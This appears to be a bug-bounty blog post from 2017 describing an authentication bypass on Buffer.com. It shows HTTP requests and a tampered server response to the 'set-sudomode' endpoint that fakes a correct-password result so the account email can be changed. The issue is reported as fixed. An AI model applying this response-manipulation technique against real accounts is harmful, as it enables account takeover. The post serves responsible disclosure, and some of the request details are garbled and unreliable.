Subscribe For Free Updates!

We'll not spam mate! We promise.

Sunday, August 20, 2017

Buffer Authentication Bypass



Hi everyone , here is one of my finding on Buffer.com . Where i managed to bypass the authentication

So basically the authentication  work flow is like below
  • To change account email user need to provide the current account password 
  •  If the password is correct then application let you to change the account email 

So lets start

when user want to change their account email id the app ask for current password  like below




so here i wanted to test the response for both correct and incorrect password response

so here is the request

POST /account/set-sudomode HTTP/1.1 200 OK
Date: ******
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword


so the response for wrong password is below

HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"} 



so here is the response for correct password



 HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}


if you observe both response just the notice_message and sudomode added in the correct password response 

so here i used a wrong password let say 123456



Request is like below 

POST /account/set-sudomode HTTP/1.1 200 OK
Date: ******
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456



Note the csrf _token value in the request that is : 
uyr37832rhehr8he7372829hefdgdf


Response  


HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"
uyr37832rhehr8he7372829hefdgdf"} 



Modify the response to 

HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudome":"true","csrf_token":"
uyr37832rhehr8he7372829hefdgdf"}


Boom now it will show successfully authenticated and you can change your email


So here is the video proof of concept

 


   Status: Fixed
Bounty Rewarded